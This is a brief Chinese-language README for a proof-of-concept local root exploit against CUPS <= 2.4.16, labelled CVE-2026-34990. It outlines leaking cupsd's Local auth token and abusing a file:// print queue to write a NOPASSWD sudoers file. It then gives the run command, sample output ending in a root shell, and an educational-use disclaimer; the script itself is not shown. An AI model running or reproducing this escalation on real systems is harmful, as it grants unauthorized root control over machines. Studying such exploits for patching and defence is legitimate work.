
针对以 root 身份运行的 CUPS <= 2.4.16 的本地权限提升。 泄露 cupsd 的 Local 认证令牌,然后通过 file:// 打印队列以 root 身份写入一个 NOPASSWD sudoers 片段。
python3 poc.py
成功时:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
然后:
sudo -i
此脚本仅供教育目的使用。作者不对由该漏洞利用造成的任何滥用或损害负责。在测试或利用漏洞之前,请务必确保您已获得授权!